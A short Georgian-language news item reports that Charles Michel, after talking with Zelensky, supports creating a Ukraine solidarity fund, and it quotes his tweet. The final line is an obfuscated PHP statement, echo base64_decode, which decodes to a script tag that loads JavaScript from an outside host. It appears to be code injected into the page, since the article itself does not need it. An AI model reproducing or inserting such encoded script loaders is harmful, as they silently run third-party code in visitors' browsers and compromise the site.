celsiusi
ავერსი საქკაბელი
ევროპული საბჭოს პრეზიდენტმა, შარლ მიშელმა უკრაინის სოლიდარობის ფონდის შექმნას მხარი დაუჭირა. ამის შესახებ შარლ მიშელმა „ტვიტერში“ დაწერა.
 
„პრეზიდენტ ზელენსკისთან განვიხილე, როგორ შეგვიძლია, გავზარდოთ კოლექტიური მხარდაჭერა უკრაინისადმი. განვიხილეთ უკრაინასა და რუსეთს შორის მიმდინარე მოლაპარაკებების კონკრეტული ელემენტები. მხარს ვუჭერ უკრაინის სოლიდარობის ფონდის შექმნას, რომელიც ხელს შეუწყობს ძირითადი სერვისების მიწოდებას და მოქალაქეების დაუყოვნებელი საჭიროებების დაკმაყოფილებას. გრძელვადიან პერსპექტივაში, გახდება საფუძველი თავისუფალი და დემოკრატიული უკრაინის აღდგენისათვის, საომარი მოქმედებების შეწყვეტის შემდეგ. პარტნიორებს შეუძლიათ, ფონდის განვითარებაში საკუთარი წვლილი საერთაშორისო დონორთა კონფერენციის მეშვეობით შეიტანონ“, – წერს შარლ მიშელი.
 
787
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");